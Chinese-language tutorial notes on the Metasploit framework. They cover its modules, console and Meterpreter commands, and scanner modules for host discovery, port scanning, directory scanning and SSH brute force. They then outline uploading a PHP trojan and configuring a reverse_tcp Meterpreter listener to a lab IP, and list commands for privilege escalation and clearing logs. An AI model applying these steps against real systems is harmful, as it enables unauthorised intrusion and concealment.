MSF基本介绍
Metasploit是一个广泛使用的开源渗透测试框架,它提供了大量的工具和模块,用于模拟各种安全攻击,帮助安全专业人员评估和增强系统的安全性。它由Rapid7公司的H.D. Moore在2003年创立,并且由一个庞大的社区支持。Metasploit包含了一个漏洞数据库,用户可以通过它来搜索和利用已知的安全漏洞。此外,Metasploit还具备生成后门、漏洞利用代码、木马、蠕虫等多种类型的恶意软件的能力
当有新的漏洞或者利用武器MSF如何更新
msfupdate
MSF功能模块
核心模块
Exploits(用来入侵,漏洞攻击库)
payloads(入侵后执行)
Auxiliary(辅助模块)
Post(维持权限)
Evasion
Encoder
Nops
MSF基本命令
msfconsole | 启动交互终端 | banner | 展示banner |
help 或? | 查看帮助,help+命令 | search | 搜索漏洞和利用数据库 |
info | 查看模块的信息 | use XXX | 使用模块 |
show options | 查看所使用模块需要配置的参数 | set name value | 设置参数值 |
set name value | 设置参数值 | run/exploit | 执行模块 |
back | 退回到主界面 | quit/exit | 退出msf |
Meterpreter 常用命令
help | 查看可以使用的命令 | sessions | 查看会话 |
sysinfo | 查看目标系统信息 | sessions -i id | 切换到指定会话 |
getuid | 查看用户 | sessions -k id | 杀死指定会话 |
getpid | 查看进程编号 | shell | 进入目标主机shell |
pwd/getlwd | 查看当前目录 | upload <local><remote> | 向目标主机上传文件 |
cd/lcd | 切换目录 | download <remote><local> | 从目标主机下载文件 |
background | 把当前会话放到后台 | search | 在目标主机上搜索文件search -f *test* |
execute | 在目标主机执行程序 execute -f notepad.exeexecute -H -i -f cmd.exe | getsystem | 提权 |
clearev | 消除痕迹 |
MSF信息收集实战
MSF信息收集
命令 | 说明 |
主机发现 | use auxiliary/scanner/discovery/arp_sweep |
端口扫描 | use auxiliary/scanner/portscan/tcp |
目录扫描 | use auxiliary/scanner/http/dir_scanner |
SSH暴破 | use auxiliary/scanner/ssh/ssh_login |
服务扫描 | use auxiliary/scanner/mysql/mysal_version use auxiliary/scancer/smb/smb_version use auxiliary/scanner/telnet/telnet_version use auxiliary/scanner/rdp/rdp_scanner |
主机发现 -网段信息-所有存活的ip 扫描ip地址
show options 查看这个模块需要做哪些配置
设置搜索的网段
最后run运行 就可以看到当前存活的ip地址
扫描当前ip的端口
查看当前模块需要的配置
设置配置运行显示结果
目录扫描
目录扫描:探测一共网站根目录,其他文件,文件夹
意义:敏感文件,源码,数据备份
可能还有后台登录
使用目录扫描模块
upload 文件上传 login 后台登录 config配置文件
SSH爆破 利用22端口 ssh远程登录
使用这个模块
添加配置模块需要的参数
运行run查看结果
MSF生成木马和利用
当进行目录扫描时有upload的目录 可以利用这个给其上传病毒
复制这个网址在浏览器打开
1.怎么制作PHP木马?(会主动连接,能执行命令)
完成命令后home目录下会生成
在80端口开启个网站 监听80端口
靶机浏览器输入kali的地址 就可以下载kali里home目录的文件
2.制作木马后msf建立监听
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.142.162
set lport 7777
run
控制后想知道能做些什么